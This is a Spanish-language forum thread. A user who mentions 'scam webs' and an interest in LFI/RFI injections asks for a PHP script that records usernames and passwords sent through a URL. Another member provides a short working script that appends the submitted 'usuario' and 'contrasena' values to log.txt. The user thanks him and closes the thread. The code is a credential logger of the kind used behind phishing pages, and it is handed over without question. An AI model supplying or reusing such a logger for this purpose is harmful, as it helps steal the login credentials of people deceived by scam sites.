quiero probar este codigo.
[Enlace externo eliminado para invitados]?usuario=__&contrasena=____
cuando ingrese el usuario y la contrasena en la "__" , ^^arriba en la direccion ;me creen en una archivo en formato php indicandome el nombre del usuario y el password..
he visto varios codigo se scam webs e intente acoplarlo pero no me salio...
he leido varios temas de inyeccion lfi , rfi entre otros pero ninguno me da como quiero..aunq me intereso mucho las inyecciones de las webs..pero primero debo terminar este tema. . para seguir con las inyecciones de la webs...
por fa ayudame en esta..
alguien q me ayude... o será q no se puede entender lo q quiero hacer?'
No veo que problema tienes, solo has de mirar la documentacion de php sobre tratamiento de archivos para ver como se abre, se escribe y se cierra despues un archivo y meter esos dos datos en el archivo.
Asi de memoria podria ser algo tan simple como :
Saludos.
Asi de memoria podria ser algo tan simple como :
Código: Seleccionar todo
<?php
if (!$archivo = fopen('log.txt','a'))
{
echo "Error al abrir el archivo";
exit;
}
fwrite($archivo, $_GET["usuario"] . " - " . $_GET["contrasena"] . "\n");
fclose($archivo);
?>
Saludos.
Todos los refranes deberían acabar en , patada en los cojones ...
gracias velario !! me sirvió de mucho Ya pueden cerrar el tema!!